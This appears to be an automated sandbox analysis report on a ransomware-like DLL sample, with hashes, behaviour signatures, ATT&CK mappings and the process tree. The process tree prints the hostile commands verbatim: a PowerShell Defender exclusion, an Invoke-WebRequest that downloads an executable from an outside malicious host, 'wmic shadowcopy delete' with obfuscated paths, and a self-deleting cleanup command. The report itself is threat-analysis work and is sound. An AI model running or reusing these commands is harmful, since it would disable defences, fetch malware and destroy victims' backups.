Analysis
-
max time kernel
93s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 08:28
Static task
static1
Behavioral task
behavioral1
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win10v2004-20241007-en
General
-
Target
fccd129f6a5b9d2133d14922a3614f02.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 3624 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4612 powershell.exe 3624 powershell.exe -
Downloads MZ/PE file
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt eryy65ty.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Decryptfiles.txt eryy65ty.exe -
Executes dropped EXE 1 IoCs
pid Process 2152 eryy65ty.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eryy65ty.exe" eryy65ty.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eryy65ty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3416 cmd.exe 3112 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3112 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4612 powershell.exe 4612 powershell.exe 3624 powershell.exe 3624 powershell.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe 2152 eryy65ty.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeIncreaseQuotaPrivilege 3528 wmic.exe Token: SeSecurityPrivilege 3528 wmic.exe Token: SeTakeOwnershipPrivilege 3528 wmic.exe Token: SeLoadDriverPrivilege 3528 wmic.exe Token: SeSystemProfilePrivilege 3528 wmic.exe Token: SeSystemtimePrivilege 3528 wmic.exe Token: SeProfSingleProcessPrivilege 3528 wmic.exe Token: SeIncBasePriorityPrivilege 3528 wmic.exe Token: SeCreatePagefilePrivilege 3528 wmic.exe Token: SeBackupPrivilege 3528 wmic.exe Token: SeRestorePrivilege 3528 wmic.exe Token: SeShutdownPrivilege 3528 wmic.exe Token: SeDebugPrivilege 3528 wmic.exe Token: SeSystemEnvironmentPrivilege 3528 wmic.exe Token: SeRemoteShutdownPrivilege 3528 wmic.exe Token: SeUndockPrivilege 3528 wmic.exe Token: SeManageVolumePrivilege 3528 wmic.exe Token: 33 3528 wmic.exe Token: 34 3528 wmic.exe Token: 35 3528 wmic.exe Token: 36 3528 wmic.exe Token: SeIncreaseQuotaPrivilege 3528 wmic.exe Token: SeSecurityPrivilege 3528 wmic.exe Token: SeTakeOwnershipPrivilege 3528 wmic.exe Token: SeLoadDriverPrivilege 3528 wmic.exe Token: SeSystemProfilePrivilege 3528 wmic.exe Token: SeSystemtimePrivilege 3528 wmic.exe Token: SeProfSingleProcessPrivilege 3528 wmic.exe Token: SeIncBasePriorityPrivilege 3528 wmic.exe Token: SeCreatePagefilePrivilege 3528 wmic.exe Token: SeBackupPrivilege 3528 wmic.exe Token: SeRestorePrivilege 3528 wmic.exe Token: SeShutdownPrivilege 3528 wmic.exe Token: SeDebugPrivilege 3528 wmic.exe Token: SeSystemEnvironmentPrivilege 3528 wmic.exe Token: SeRemoteShutdownPrivilege 3528 wmic.exe Token: SeUndockPrivilege 3528 wmic.exe Token: SeManageVolumePrivilege 3528 wmic.exe Token: 33 3528 wmic.exe Token: 34 3528 wmic.exe Token: 35 3528 wmic.exe Token: 36 3528 wmic.exe Token: SeBackupPrivilege 1648 vssvc.exe Token: SeRestorePrivilege 1648 vssvc.exe Token: SeAuditPrivilege 1648 vssvc.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeDebugPrivilege 2152 eryy65ty.exe Token: SeIncreaseQuotaPrivilege 2144 wmic.exe Token: SeSecurityPrivilege 2144 wmic.exe Token: SeTakeOwnershipPrivilege 2144 wmic.exe Token: SeLoadDriverPrivilege 2144 wmic.exe Token: SeSystemProfilePrivilege 2144 wmic.exe Token: SeSystemtimePrivilege 2144 wmic.exe Token: SeProfSingleProcessPrivilege 2144 wmic.exe Token: SeIncBasePriorityPrivilege 2144 wmic.exe Token: SeCreatePagefilePrivilege 2144 wmic.exe Token: SeBackupPrivilege 2144 wmic.exe Token: SeRestorePrivilege 2144 wmic.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 1884 wrote to memory of 3928 1884 rundll32.exe 82 PID 1884 wrote to memory of 3928 1884 rundll32.exe 82 PID 1884 wrote to memory of 3928 1884 rundll32.exe 82 PID 3928 wrote to memory of 764 3928 rundll32.exe 83 PID 3928 wrote to memory of 764 3928 rundll32.exe 83 PID 3928 wrote to memory of 764 3928 rundll32.exe 83 PID 764 wrote to memory of 4612 764 cmd.exe 85 PID 764 wrote to memory of 4612 764 cmd.exe 85 PID 764 wrote to memory of 4612 764 cmd.exe 85 PID 3928 wrote to memory of 3400 3928 rundll32.exe 90 PID 3928 wrote to memory of 3400 3928 rundll32.exe 90 PID 3928 wrote to memory of 3400 3928 rundll32.exe 90 PID 3400 wrote to memory of 3624 3400 cmd.exe 92 PID 3400 wrote to memory of 3624 3400 cmd.exe 92 PID 3400 wrote to memory of 3624 3400 cmd.exe 92 PID 3928 wrote to memory of 544 3928 rundll32.exe 98 PID 3928 wrote to memory of 544 3928 rundll32.exe 98 PID 3928 wrote to memory of 544 3928 rundll32.exe 98 PID 544 wrote to memory of 2152 544 cmd.exe 100 PID 544 wrote to memory of 2152 544 cmd.exe 100 PID 544 wrote to memory of 2152 544 cmd.exe 100 PID 2152 wrote to memory of 3528 2152 eryy65ty.exe 101 PID 2152 wrote to memory of 3528 2152 eryy65ty.exe 101 PID 2152 wrote to memory of 2144 2152 eryy65ty.exe 109 PID 2152 wrote to memory of 2144 2152 eryy65ty.exe 109 PID 2152 wrote to memory of 3416 2152 eryy65ty.exe 110 PID 2152 wrote to memory of 3416 2152 eryy65ty.exe 110 PID 2152 wrote to memory of 3416 2152 eryy65ty.exe 110 PID 3416 wrote to memory of 3112 3416 cmd.exe 113 PID 3416 wrote to memory of 3112 3416 cmd.exe 113 PID 3416 wrote to memory of 3112 3416 cmd.exe 113 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Users\Admin\AppData\Local\Temp\eryy65ty.exeC:\Users\Admin\AppData\Local\Temp/eryy65ty.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152 -
\??\c:\Windows\system32\wbem\wmic.exec:\OutvgQ\Outv\..\..\Windows\Outv\Outv\..\..\system32\Outv\Outv\..\..\wbem\Outv\Outvg\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\nqQsTX\nqQs\..\..\Windows\nqQs\nqQs\..\..\system32\nqQs\nqQs\..\..\wbem\nqQs\nqQsT\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3112
-
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
16KB
MD5d3c6131a7627d8766176cd39e2f98b60
SHA1bfb33abe9dcbcc6a9822a8032d45c85d710fc5f8
SHA2561e09df3e0b71710f0f68b3559312bf99a9f15be6a5ba90f5c9d10c091f7a5543
SHA512f49525731fa468141a51d6d12e409670eeb41a1a85f3de9b1f84e3563c0b38fe0318fd91589ac4cc6d5823c701abe836c4742a03564dea81cabe9093a3a1c91f
-
Filesize
4KB
MD5803bcafa81499808f26d9a23d84a4c60
SHA1237ba364c76f799fc4073272bdfe5cd16eb9047b
SHA2562d95261dd0a05899148e9eaa7efb937cc53a3ad4ba8f7650d32fd0e14c08c7b6
SHA5120f5aa6ce70bf2249ea08871e65039720575c205a5c7eba3327f6c573ccd6ce8715020b268ef5af71c4ddb75e31e6319be839e4dd4fffd172fe71ae4533ffd3ba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
881KB
MD59049faba5517305c44bd5f28398fb6b9
SHA1036c6b32f3e7d7d689c9b4d482091eebcc669bfa
SHA256d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3
SHA51265a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a